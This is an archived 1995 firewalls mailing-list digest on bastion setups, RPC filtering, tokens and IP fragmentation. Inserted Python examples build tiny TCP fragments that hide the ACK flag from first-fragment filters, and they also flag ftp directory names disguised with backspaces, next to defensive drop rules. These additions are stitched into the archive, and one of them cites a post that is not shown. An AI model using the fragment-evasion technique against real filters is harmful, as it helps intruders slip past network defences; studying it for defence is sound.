| Phone : (408)992-2779 P.O. Box 3470 M/S 316                 \\/ Will   |
| FAX   : (408)773-0833 Sunnyvale, CA 94088-3470             _/\\ Travel |
\___________________________O16-2294________________________\)__________/

From firewalls-owner Mon May 8 14:14:12 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA20540 for firewalls-outgoing; Mon, 8 May 1995 13:40:20 -0700
Received: from netcom16.netcom.com (netcom16.netcom.com [192.100.81.129]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA20465 for ; Mon, 8 May 1995 13:40:15 -0700
From: Ruiyuan_Jiang/Advantage_KBS_at_LotusXchg@njcorp.akbs.com
Received: from njcorp.akbs.com by netcom16.netcom.com (8.6.12/Netcom) id NAA28158; Mon, 8 May 1995 13:39:39 -0700
Received: from cc:Mail by njcorp.akbs.com id AA799976284; Mon, 08 May 95 16:37:00 EST
Date: Mon, 08 May 95 16:37:00 EST
Encoding: 44 Text
Message-Id: <9504087999.AA799976284@njcorp.akbs.com>
To: firewalls@greatcircle.com
Subject: Re: fw newbie needs validation
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Sorry, Martin, I can not give you an answer but I have a question about your draft picture. Between your two Cisco routers is your firewall bastion; the question is, on your firewall bastion are there two network cards or just one network card? I mean, if you use two network cards then one connects to Cisco 2504 and the other one connects to Cisco 1003; in this situation there is no direct connection between Cisco 2504 and Cisco 1003 and all the traffic passes the firewall bastion. If your firewall bastion just has one network card connected, then Cisco 2504 and Cisco 1003 have a direct connection. I read the book "Firewalls and Internet Security" and the pictures in the book look like the two routers (one is the firewall) have a direct connection.

Can anyone clear my mind?
Thanks

---------------------- Reply Separator ---------------------

We are about to get connected and the IS guys are nervous about their data so they insist on a firewall. My budget is almost nil so we'll probably go with TIS's fwtk running over FreeBSD 2.0. If I understood what I gathered here and in Cheswick & Bellovin, our setup would look like this:

+-------------+     +---------+
|             |     |         |
| Inside nets,|-----| Cisco   |-----|      +----------+
| servers...  |     | 2504    |     |------| Cisco    |----- Internet
+-------------+     | Eth-Eth |     |      | 1003     |
                    +---------+     |      | Eth-ISDN |
                                    |      +----------+
                       +---------+  |
                       |Firewall/|--|
                       |Bastion  |
                       |(fwtk)   |
                       +---------+

With static routes between the 1003<->firewall and 2504<->firewall. Anything heretic/dumb/screwed/laughable... about this ?

__________________________.
Martin Durand | I know I should be working on my .sig file,
nit@llc.org   | but who reads these things...

From firewalls-owner Mon May 8 15:58:58 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA05104 for firewalls-outgoing; Mon, 8 May 1995 14:52:06 -0700
Received: from delphi.cert.org (delphi.cert.org [192.88.210.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA05092 for ; Mon, 8 May 1995 14:52:01 -0700
Received: (from mjw@localhost) by delphi.cert.org (8.6.10/8.6.9) id RAA15597; Mon, 8 May 1995 17:54:37 -0400
Message-Id: <199505082154.RAA15597@delphi.cert.org>
From: Moira West-Brown
Subject: E-Mail response expectation.
To: Firewalls@GreatCircle.COM
Date: Mon, 8 May 95 17:54:36 EDT
Reply-To: Moira West-Brown
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

[This is an automated reply.]

Your message has been received, however I am out of the office between Tuesday 9th May and Friday May 12th. During that time I may only have limited access to e-mail. If your message was regarding CERT business and if it was not sent (or cc'd) to "cert@cert.org", your message will go unaddressed until I return.
Please resend any CERT-related e-mail to cert@cert.org so that CERT staff can review it and follow up if appropriate.

Regards
Moira

Moira J. West-Brown
Manager, Incident Handling

CERT Coordination Center          | Telephone: +1-412-268-7090 24-hour hotline
Software Engineering Institute    | CERT Coordination Center personnel answer
Carnegie Mellon University        | business days 08:30-17:00 EST/EDT
Pittsburgh, PA 15213-3890         | (GMT-5)/(GMT-4), on call for emergencies
U.S.A.                            | during other hours.
Internet E-mail: cert@cert.org    | Fax: +1-412-268-6989

From firewalls-owner Mon May 8 16:09:10 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA06006 for firewalls-outgoing; Mon, 8 May 1995 15:31:31 -0700
Received: from gold.chem.hawaii.edu (gold.chem.Hawaii.Edu [128.171.55.9]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA06001 for ; Mon, 8 May 1995 15:31:28 -0700
Received: by gold.chem.hawaii.edu (4.1/gold-MX-1.9) id AA18927; Mon, 8 May 95 12:31:39 HST
Date: Mon, 8 May 1995 12:30:40 -1000 (HST)
From: NetSurfer
Subject: Re: PC site security
To: "S. Alexander Jacobson"
Cc: Gil Tennant , firewalls@GreatCircle.COM
In-Reply-To:
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Re Chamelion 4.5 and netware drives - I'll email them separately and ask.

-NetSurfer

#include
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
== = =                 |James D. Wilson        |V.PGP 2.7: 512/E12FCD 1994/03/17
 > " " o "             |P. O. Box 15432        | finger for full PGP key
 > " " / \ "           |Honolulu, HI 96830     |====================================>
  \" "/ G \"           |Serendipitous Solutions| Also NetSurfer@sersol.com
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

From firewalls-owner Mon May 8 18:05:03 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA07715 for firewalls-outgoing; Mon, 8 May 1995 17:06:49 -0700
Received: from bootes.sds.no (bootes.sds.no [139.105.192.91]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA07706 for ; Mon, 8 May 1995 17:06:43 -0700
Received: by bootes.sds.no (5.65/DEC-Ultrix/4.3) id AA16240; Mon, 8 May 1995 21:27:49 +0200
Date: Mon, 8 May 1995 21:29:38 CST
From: toreh
Subject: If you've got nothing to do, don't do it here (was Re: Pentagon security professionals)
To: "Marcus J. Ranum" , firewalls@greatcircle.com
Message-Id:
Priority: Normal
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Thu, 4 May 1995 09:28:07 -0400 (EDT) Marcus J. Ranum wrote:

> From: Marcus J. Ranum
> Date: Thu, 4 May 1995 09:28:07 -0400 (EDT)
> Subject: Re: Pentagon security professionals
> To: "Dr. Frederick B. Cohen"
> Cc: firewalls@greatcircle.com
>
> Dr. Frederick B. Cohen writes:
> > Please feel free to flame away.
>
> No, please don't flame away.
>
> The list has enough problems with poor signal to noise ratio
> without someone *encouraging* flaming. I've noticed a tendency for
> some discussions on the list to continue interminably, in which one
> or both parties refuse to forgo getting in the last word. In those
> cases I am trying (and encourage others to do likewise) to cease
> engaging in a discussion after a reasonable number of mails back
> and forth.
>
> mjr.

Yes, please, I have been reading this group for 3 years, and I am seriously thinking of dropping out, signal/noise ratio is way too high.
If I get busy for a week, when I return, I may have to dump several hundred messages to get up-to-date...

-- tore

From firewalls-owner Mon May 8 18:10:01 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA08240 for firewalls-outgoing; Mon, 8 May 1995 17:40:21 -0700
Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA08230 for ; Mon, 8 May 1995 17:40:15 -0700
From: ari@soscorp.com
Received: from UVS1.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA12410; Mon, 8 May 95 17:13:40 -0400
Date: Mon, 8 May 95 17:13:40 -0400
Message-Id: <9505082113.AA12410@uvs1.orl.mmc.com>
To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
Cc: "firewalls@greatcircle.com"@uvs1.dnet.mmc.com
Subject: One Time Password Tokens
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>From the firewalls mailing list. Anybody have any contact information about Secure Computing?

Ari

-----------------------------------

>>>>> On Sun, 7 May 95 08:18:03 -0400, padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) said:

...

Padgett> Recently two companies using challenge-response
Padgett> technology (Enigma-Logic and Secure Computing) have
Padgett> introduced the next logical step, software based
Padgett> tokens. In each, software is running in the
Padgett> background on the user's computer that recognizes
Padgett> when a challenge is received and pops up a window for
Padgett> the user to enter her/his/etc. PIN. The process is
Padgett> then handled entirely in the background.

...
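Returning to Patrick Horgan's post earlier in this digest about directory names built from spaces and backspaces: the following is an added example, not code from that post, from Amdahl, or from any ftp server, showing how an administrator can audit an anonymous-ftp tree for such names. It walks the tree, flags every entry whose name contains a control character or consists of, begins with, or ends with spaces, and spells the name out with C-style escapes the way GNU `ls -b` does, so the 16-byte name that a terminal draws as "hd" becomes readable. The sample tree under a temporary directory, and every name in it, is constructed inside the block.

```python
import os
import shutil
import tempfile

# Bytes a terminal will not draw as themselves: the ASCII controls plus DEL.
CONTROL = {chr(c) for c in range(32)} | {chr(127)}
NAMED_ESCAPES = {"\b": "\\b", "\t": "\\t", "\n": "\\n", "\r": "\\r", "\\": "\\\\"}


def escape_name(name):
    """Spell out a name the way 'ls -b' prints it: \\b for backspace, octal
    escapes for other control bytes, doubled backslashes, everything else as is."""
    parts = []
    for ch in name:
        if ch in NAMED_ESCAPES:
            parts.append(NAMED_ESCAPES[ch])
        elif ch in CONTROL:
            parts.append("\\%03o" % ord(ch))
        else:
            parts.append(ch)
    return "".join(parts)


def is_suspicious(name):
    """True when a plain 'ls' would misrepresent the name: it holds a control
    character, or it is nothing but spaces, or it starts or ends with a space.
    "a b" from the post is ordinary and is not flagged."""
    if any(ch in CONTROL for ch in name):
        return True
    stripped = name.strip(" ")
    return stripped == "" or stripped != name


def find_suspicious(root):
    """Walk root (symlinks are not followed) and return the escaped relative
    path of every directory or file with a suspicious name, sorted."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            if is_suspicious(name):
                rel = os.path.relpath(os.path.join(dirpath, name), root)
                hits.append(escape_name(rel))
    return sorted(hits)


def demo():
    """Build a constructed sample tree in a temporary directory, scan it, remove
    it, and return the findings. The three odd names are the ones from the post."""
    root = tempfile.mkdtemp(prefix="ftp-audit-")
    try:
        pub = os.path.join(root, "pub")
        os.makedirs(os.path.join(pub, "incoming"))                  # ordinary, not reported
        os.makedirs(os.path.join(pub, " "))                         # mkdir " "
        os.makedirs(os.path.join(pub, " \b"))                       # a space then a backspace
        os.makedirs(os.path.join(pub, "my\b\bhack\b\b\bdir\b\b"))   # drawn by a terminal as "hd"
        with open(os.path.join(pub, "README"), "w") as fh:
            fh.write("constructed sample tree\n")
        return find_suspicious(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for entry in demo():
        print(entry)
```

Run against a real ftp area, the scan takes the root directory instead of the constructed tree. On systems whose `ls` has no `-b`, POSIX `ls -q` at least replaces each non-printable byte with `?`, which makes the hidden 14 bytes visible as width even if not as content.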
From firewalls-owner Mon May 8 18:48:41 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA08136 for firewalls-outgoing; Mon, 8 May 1995 17:27:47 -0700
Received: from ken.canbtimes.com.au (ken.canbtimes.com.au [203.5.63.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA08124 for ; Mon, 8 May 1995 17:27:35 -0700
Message-Id: <199505090027.RAA08124@miles.greatcircle.com>
Received: by ken.canbtimes.com.au (1.37.109.11/16.2) id AA176799355; Tue, 9 May 1995 10:29:15 +1000
From: John Cougar
Subject: Real Fires
To: firewalls@GreatCircle.com
Date: Tue, 9 May 95 10:29:14 EST
Mailer: Elm [revision: 70.85.2.1]
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi All at the Great "Inner" Circle ...

On the subject of real fires: does anyone have any war stories, statistics, sources of info. on the issue of fires started by computer systems? I'm trying to put together some references and statistics on this issue and would appreciate International help (I have a fair amount of local stuff already ...)

Please reply directly to me using the Header "Real Fires" and I'll be happy to summarise and post the results.

Cheers!
-- 
----------------------------------------------------------------------
John Cougar                        | email: johnc@canbtimes.com.au
Systems Consultant                 | voice: ++ 61 6 280 2128
Australian Technology Resources    | mobile: ++ 61 018 488867
                                   | fax: ++ 61 6 280 5420
----------------------------------------------------------------------

From firewalls-owner Mon May 8 18:52:47 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA08122 for firewalls-outgoing; Mon, 8 May 1995 17:27:09 -0700
Received: from lokkur.dexter.mi.us (dexter-gw.dexter.msen.com [148.59.2.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA08117 for ; Mon, 8 May 1995 17:27:05 -0700
Received: (scs@localhost) by lokkur.dexter.mi.us (8.6.11/8.6.5) id LAA19842; Mon, 8 May 1995 11:36:43 -0400
Date: Mon, 8 May 1995 11:36:43 -0400
From: Steve Simmons
Message-Id: <199505081536.LAA19842@lokkur.dexter.mi.us>
To: firewalls@greatcircle.com
Subject: Re: IP packet filtering...
Newsgroups: local.firewalls
References: <199505080255.TAA23401@miles.greatcircle.com>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Darren Reed wrote:

>Somewhat luckily for filtering, in TCP and UDP packets the port numbers
>are almost assured of being in the first fragment. The "established"
>bit can be in the 2nd or 3rd. And you *CAN* make a TCP connection with an
>MTU of 28, successfully - I've done it.

What the heck kind of technology uses MTU of 28? I could have sworn that there was a `minimum maximum' MTU of several hundred (503?) in one of the RFCs, but couldn't find it in what I've got on line.

In addition, I'm fairly certain that an IP header may not be fragmented and that datagram sizes are in multiples of 32 bit. Taken together, that means any datagram must have space for at least 32 bits of data. Since the source and destination port are in the first 32 bits of both TCP and UDP headers, the first fragment *must* contain the port numbers.
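Steve's reasoning above, and Darren Reed's reply later in this digest that fragments are cut in 8-byte units so a 20-byte TCP header can be spread over three of them, can be checked by hand. The following is an added example, not code from either message or from any filtering product: it builds an IP datagram carrying a bare TCP segment, fragments it with 8 bytes of transport data per fragment (Darren's MTU of 28), and shows which fragment a first-fragment-only filter can read the ports from and which one actually carries the ACK ("established") bit. Two defensive policies are then applied to the fragments: Mike Sapp's "drop every fragment" rule, and a narrower rule that drops only a first fragment too short to hold the whole TCP header and any fragment at offset 8, the two conditions later written up in RFC 1858. The addresses, ports and the fragment size are constructed.

```python
import socket
import struct

IP_MF = 0x2000           # "more fragments" bit of the IPv4 flags/fragment-offset word
IP_OFFSET_MASK = 0x1FFF  # fragment offset, in 8-byte units
TCP_ACK = 0x10           # ACK bit of the TCP flags byte (what an "established" filter tests)
TCP_HDR_LEN = 20         # TCP header without options
IP_HDR_FMT = "!BBHHHBBH4s4s"


def ipv4_header(src, dst, proto, payload_len, frag_off=0, more=False, ident=0x1234):
    """20-byte IPv4 header; frag_off is in bytes and must be a multiple of 8.
    The checksum is left zero because nothing here depends on it."""
    assert frag_off % 8 == 0
    frag_word = (IP_MF if more else 0) | (frag_off // 8)
    return struct.pack(IP_HDR_FMT, 0x45, 0, 20 + payload_len, ident, frag_word,
                       64, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))


def tcp_header(sport, dport, flags, seq=1, ack=1, window=8192):
    """20-byte TCP header: ports, seq, ack, data offset 5, flags, window, csum, urg."""
    return struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, window, 0, 0)


def fragment(src, dst, proto, transport, unit=8):
    """Split the transport bytes into IPv4 fragments carrying `unit` bytes each."""
    frags = []
    for off in range(0, len(transport), unit):
        chunk = transport[off:off + unit]
        more = off + unit < len(transport)
        frags.append(ipv4_header(src, dst, proto, len(chunk), off, more) + chunk)
    return frags


def parse_ipv4(pkt):
    """The fields a packet filter needs: protocol, fragment position, payload."""
    fields = struct.unpack(IP_HDR_FMT, pkt[:20])
    ihl = (fields[0] & 0x0F) * 4
    total_len, frag_word, proto = fields[2], fields[4], fields[6]
    return {"proto": proto,
            "more": bool(frag_word & IP_MF),
            "frag_off": (frag_word & IP_OFFSET_MASK) * 8,
            "payload": pkt[ihl:total_len]}


def visible_tcp_fields(pkt):
    """What a filter that inspects only the first fragment can actually read:
    the ports need 4 bytes of TCP header, the flags byte needs 14."""
    ip = parse_ipv4(pkt)
    if ip["frag_off"] != 0:
        return None
    p = ip["payload"]
    return {"ports": struct.unpack("!HH", p[:4]) if len(p) >= 4 else None,
            "flags": p[13] if len(p) >= 14 else None}


def policy_drop_all_fragments(pkt):
    """Mike Sapp's rule: every packet that is part of a fragmented datagram is dropped."""
    ip = parse_ipv4(pkt)
    return "drop" if ip["more"] or ip["frag_off"] else "pass"


def policy_tiny_fragments(pkt):
    """Narrower rule: drop a TCP first fragment that truncates the TCP header
    (the filter cannot see the flags) and any fragment at offset 8 (on
    reassembly it could overwrite the flags the first fragment showed)."""
    ip = parse_ipv4(pkt)
    if ip["proto"] != socket.IPPROTO_TCP:
        return "pass"
    if ip["frag_off"] == 0 and len(ip["payload"]) < TCP_HDR_LEN:
        return "drop"
    if ip["frag_off"] == 8:
        return "drop"
    return "pass"


def demo():
    """Constructed sample: an ACK segment from 10.0.0.1:80 to 192.0.2.5:1234,
    fragmented with 8 bytes of TCP header per fragment (MTU 28)."""
    tcp = tcp_header(80, 1234, TCP_ACK)
    frags = fragment("10.0.0.1", "192.0.2.5", socket.IPPROTO_TCP, tcp)
    second = parse_ipv4(frags[1])["payload"]          # TCP bytes 8..15
    return {"fragments": len(frags),
            "first_fragment_shows": visible_tcp_fields(frags[0]),
            "ack_bit_in_second": bool(second[5] & TCP_ACK),   # TCP byte 13 = byte 5 here
            "drop_all": [policy_drop_all_fragments(f) for f in frags],
            "tiny": [policy_tiny_fragments(f) for f in frags]}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The first fragment does carry both port numbers, as Steve says, but the flags byte lands in the second fragment, which a first-fragment-only filter passes without looking at. The narrower policy keeps ordinary fragmented traffic flowing while closing that gap; the drop-everything rule is simpler and costs only large-datagram performance.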
From firewalls-owner Mon May 8 18:54:04 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA07938 for firewalls-outgoing; Mon, 8 May 1995 17:16:16 -0700
Received: from sequoia.itd.uts.EDU.AU (sequoia.itd.uts.EDU.AU [138.25.16.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA07931 for ; Mon, 8 May 1995 17:15:57 -0700
Received: from lordmuck.itd.uts.edu.au. by sequoia.itd.uts.EDU.AU with SMTP id AA04610 (5.65c/IDA-1.4.4 for ); Tue, 9 May 1995 10:15:03 +1000
Received: (from matt@localhost) by lordmuck.itd.uts.edu.au. (8.6.12/Jas 1.1) id KAA07028; Tue, 9 May 1995 10:13:11 +1000
From: Jas (Matthew K)
Message-Id: <199505090013.KAA07028@lordmuck.itd.uts.edu.au.>
Subject: Re: security of RPC
To: jcarroll@wellspring.us.dg.com
Date: Tue, 9 May 1995 10:13:11 +1000 (EST)
Cc: firewalls@greatcircle.com (Firewalls Mailing List)
In-Reply-To: <9505081347.AA07146@wellspring.us.dg.com> from "Jim Carroll" at May 8, 95 09:47:02 am
X-Gc: GCV 2.1 GAT/M/CS d--(-+) H-- s++:-- g+ p? !au a-(?) w+++ v+ C+++$
X-Gc: UVS++++$ P+>+++ L- 3+++ E-(++) N++ K W--- M+ V-- -po+(+) Y+ t+
X-Gc: !5++ jx R+ G? !tv b+++ D++ B e+ u--(**) h- f+(*) r n- !y
X-Ph: ph: +61 2 330 1390 fax: +61 2 330 1999 home: +61 2 416 5722
X-Pager: +61 2 214 1111 #849482
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1383
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Jim Carroll wrote this...
>
> On 8 May 95 at 0:26, Matthew K was heard to utter:
>
> > SecureRPC has a mechanism that does exactly this.. has done for
> > years, and yes RPC is available for platforms other than Un*x
>
> I've been meaning to ask this one for a while. Now is as good a time
> as any.
>
> I thought RPC-based servers used dynamically assigned ports.
>
> If this is true, then isn't SecureRPC an oxymoron?

if this is a problem, source code for both portmapper and rpcbind protocols are available, in which case you can roll your own, and have it forward events to your firewall, so it can keep a track of what to allow/deny.

or another route.. all RPC packets have a set format, so just grep through the format for the program/version info, and allow/deny on that basis. it ain't brain surgery, i just haven't seen anyone do it yet (i could be wrong here, i personally haven't heard of a firewall that does this). sniffers can detect RPC packets.. so why can't firewalls?

Matt
-- 
#!/bin/sh
echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit
Matthew Keenan                    Systems Programmer
Information Technology Division   University of Technology Sydney
Australia

It's nice to be in a position where people apologize because they assume there's humor in your work, based on past experience, but they're not sure where it is.  -- Rob Pike

From firewalls-owner Mon May 8 19:11:09 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA09977 for firewalls-outgoing; Mon, 8 May 1995 18:58:39 -0700
Received: from netcom8.netcom.com (netcom8.netcom.com [192.100.81.117]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA05342 for ; Mon, 8 May 1995 11:32:37 -0700
Received: by netcom8.netcom.com (8.6.12/Netcom) id LAA04148; Mon, 8 May 1995 11:32:14 -0700
Date: Mon, 8 May 1995 11:32:14 -0700 (PDT)
From: Bob Bosen
Subject: Re: protecting dial-in/dial-out
To: tyork@doas.state.ga.us
cc: firewalls@greatcircle.com
In-Reply-To: <9505081306.AA15787@mail.DOAS.State.GA.US>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

You could implement an authenticating firewall based on non-replayable passwords. You can obtain a free trial version of everything you might need to try this out from our anonymous ftp archives, listed below.
Contact me with a description of your computing platform(s) and I will help you locate exactly what you need to work out a free trial. Regards, Bob Bosen Enigma Logic Inc. 2151 Salvio St. #301 Concord, CA 94520 USA Tel: +1 510 827-5707 Internet: bbosen@netcom.com anonymous ftp archives: ftp.netcom.com /pub/bb/bbosen/Enigma read.me also: (bigger archives) ftp.netcom.com /pub/sa/safeword readme.001 ************************************************************************** * "It wasn't me!!! Somebody must have captured my username/password!!!" * ************************************************************************** On Mon, 8 May 1995 tyork@doas.state.ga.us wrote: > I am trying to find some info on how modem access to a DEC Alpha > attached to our network can be protected from unauthorized use. Is > there a firewall or something like that? The machine is used for direct > data tranfers to our districs and is called by the distric machines to > update databases on the Alpha. > > TIA > > -TY > *************************************************************************** > --> My chicken peck'en is mine and mine alone - Not my employers! > --> Tracy York tyork@doas.state.ga.us > > --> State of Georgia - DOAS/MIS/CSS > > --> 200 Piedmont Ave. SE, Ste 1620W > --> Atlanta, GA. 30334-9010 Off Ph (404)657-4928 > *************************************************************************** > > From firewalls-owner Mon May 8 19:40:39 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA10759 for firewalls-outgoing; Mon, 8 May 1995 19:30:52 -0700 Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA10754 for ; Mon, 8 May 1995 19:30:46 -0700 Message-Id: <199505090230.TAA10754@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA269886715; Tue, 9 May 1995 12:31:55 +1000 From: Darren Reed Subject: Re: IP packet filtering... 
To: scs@lokkur.dexter.mi.us (Steve Simmons)
Date: Tue, 9 May 1995 12:31:55 +1000 (EST)
Cc: firewalls@greatcircle.com

In some mail from Steve Simmons, they said:
>
> Darren Reed wrote:
>
> >Somewhat luckily for filtering, in TCP and UDP packets the port numbers
> >are almost assured of being in the first fragment. The "established"
> >bit can be in the 2nd or 3rd. And you *CAN* make a TCP connection with an
> >MTU of 28, successfully - I've done it.
>
> What the heck kind of technology uses MTU of 28? I could have sworn
> that there was a `minimum maximum' MTU of several hundred (503?) in
> one of the RFCs, but couldn't find it in what I've got on line.

You're thinking of the "minimum datagram reassembly size" - which is 576. All implementations of IP must be able to reassemble a packet of at least that size from smaller fragments.

> In addition, I'm fairly certain that an IP header may not be fragmented
> and that datagram sizes are in multiples of 32 bit. Taken together,
> that means any datagram must have space for at least 32 bits of data.
> Since the source and destination port are in the first 32 bits of both
> TCP and UDP headers, the first fragment *must* contain the port numbers.

The IP header is 20 bytes (5 32-bit words). A datagram can be of any size. A fragment of a datagram with IP and TCP headers is 40 bytes. Fragments must be made in 64-bit (8 byte) increments. I can fragment the TCP header into 3 fragments to make up the extra 20 bytes.

To this, I might add, it is rather fortunate that all reassembly routines I've examined so far use the "hole-filling" paradigm (RFC 815).
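The fragmentation Darren describes, modelled in code as an added example (not code from his post): an MTU of 28 leaves 8 payload bytes per fragment, so a 20-byte TCP header spreads over three fragments, with the ports in the first and the flags byte (offset 13) in the second. The block also shows an RFC 815 hole-filling reassembler and a filter check that refuses fragments too small to carry the fields a filter must see (the rule later written up in RFC 1858); the sample TCP header, the class and function names and the 20-byte threshold are this example's own.

```python
import struct
from dataclasses import dataclass
from typing import List, Optional

FRAG_UNIT = 8            # IP fragment offsets count 8-byte units
IP_HEADER = 20           # 5 32-bit words, no options
TCP_HEADER = 20
TCP_FLAGS_OFFSET = 13    # byte of the TCP header holding SYN/ACK/FIN/...
PROTO_TCP = 6

@dataclass(frozen=True)
class Fragment:
    offset: int          # fragment offset in 8-byte units, as the IP header carries it
    more: bool           # the More Fragments (MF) flag
    payload: bytes
    proto: int = PROTO_TCP

def fragment(datagram: bytes, mtu: int) -> List[Fragment]:
    """Split a transport datagram into IP fragments fitting `mtu` bytes (IP header
    included); every fragment but the last is a multiple of 8 bytes."""
    room = (mtu - IP_HEADER) // FRAG_UNIT * FRAG_UNIT
    if room <= 0:
        raise ValueError("MTU too small for even one 8-byte fragment unit")
    return [Fragment(start // FRAG_UNIT, start + room < len(datagram), datagram[start:start + room])
            for start in range(0, len(datagram), room)]

def fragment_holding(frags: List[Fragment], byte_offset: int) -> Optional[int]:
    """Index of the fragment carrying a given byte of the original datagram."""
    for i, f in enumerate(frags):
        first = f.offset * FRAG_UNIT
        if first <= byte_offset < first + len(f.payload):
            return i
    return None

class HoleFillingReassembler:
    """RFC 815 reassembly: keep a list of (first, last) holes and let each arriving
    fragment carve out the part of any hole it covers.  The trailing hole to
    'infinity' is dropped when the fragment without MF arrives."""
    INFINITY = 1 << 32

    def __init__(self) -> None:
        self.holes = [(0, self.INFINITY)]
        self.buf = bytearray()

    def add(self, frag: Fragment) -> None:
        first = frag.offset * FRAG_UNIT
        last = first + len(frag.payload) - 1
        remaining = []
        for h_first, h_last in self.holes:
            if first > h_last or last < h_first:       # fragment does not touch this hole
                remaining.append((h_first, h_last))
                continue
            if first > h_first:                        # hole left in front of the fragment
                remaining.append((h_first, first - 1))
            if last < h_last and frag.more:            # hole left behind it, unless it is the tail
                remaining.append((last + 1, h_last))
        self.holes = remaining
        if len(self.buf) < last + 1:
            self.buf.extend(b"\0" * (last + 1 - len(self.buf)))
        self.buf[first:last + 1] = frag.payload

    def datagram(self) -> Optional[bytes]:
        """The reassembled datagram once no hole is left, else None."""
        return bytes(self.buf) if not self.holes else None

def tiny_fragment_verdict(frag: Fragment) -> str:
    """Filter rule for TCP fragments (the checks later written up in RFC 1858): a
    first fragment must carry the whole TCP header so the filter can see the flags,
    and an offset-1 fragment is refused because it could overwrite the flags of a
    first fragment that was already accepted."""
    if frag.proto != PROTO_TCP:
        return "pass"
    if frag.offset == 0 and len(frag.payload) < TCP_HEADER:
        return "drop: first fragment too short to hold the TCP header"
    if frag.offset == 1:
        return "drop: offset-1 fragment could overlap the TCP flags"
    return "pass"

# Constructed sample: a 20-byte TCP header (sport 40000, dport 23, ACK set,
# no options) followed by 4 bytes of data, 24 bytes in all.
SAMPLE_TCP_HEADER = struct.pack("!HHIIBBHHH", 40000, 23, 1, 1, 5 << 4, 0x10, 8192, 0, 0)
SAMPLE_DATAGRAM = SAMPLE_TCP_HEADER + b"ping"

if __name__ == "__main__":
    frags = fragment(SAMPLE_DATAGRAM, 28)           # MTU 28: 8 payload bytes per fragment
    print(len(frags), "fragments of", [len(f.payload) for f in frags], "bytes")
    print("ports in fragment", fragment_holding(frags, 0),
          "- flags byte in fragment", fragment_holding(frags, TCP_FLAGS_OFFSET))
    for f in frags:
        print(f"offset={f.offset} MF={int(f.more)} -> {tiny_fragment_verdict(f)}")
    r = HoleFillingReassembler()
    for f in reversed(frags):                       # arrival order does not matter
        r.add(f)
    print("reassembled correctly:", r.datagram() == SAMPLE_DATAGRAM)
```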
Had the one in the original RFC (791) been in common use, it would have been a lot less cosy doing packet filtering :-/

darren

From firewalls-owner Mon May 8 21:10:02 1995
From: cwerner@hsdemo.merit.edu (Christopher L. Werner)
Date: Mon, 8 May 1995 23:48:19 -0500
To: firewalls@GreatCircle.com
Subject: ftp through 2 dual-homed bastions

About a month ago ftp through a firewall was discussed. Things seemed to gravitate toward ftp clients which supported PASV, including some of the web browsers. For various reasons I am looking at the following configuration:

    Outside                                        Inside
    ----     -----------Router--------          ---------
            dual-homed              dual-homed
             bastion                 bastion
    A           X                       Y            B

User on internal net ftps Inside and connects to B. ftp-gw forwards connection to X. Responses from X are handled by ftp-gw back to B. No ip-forwarding.

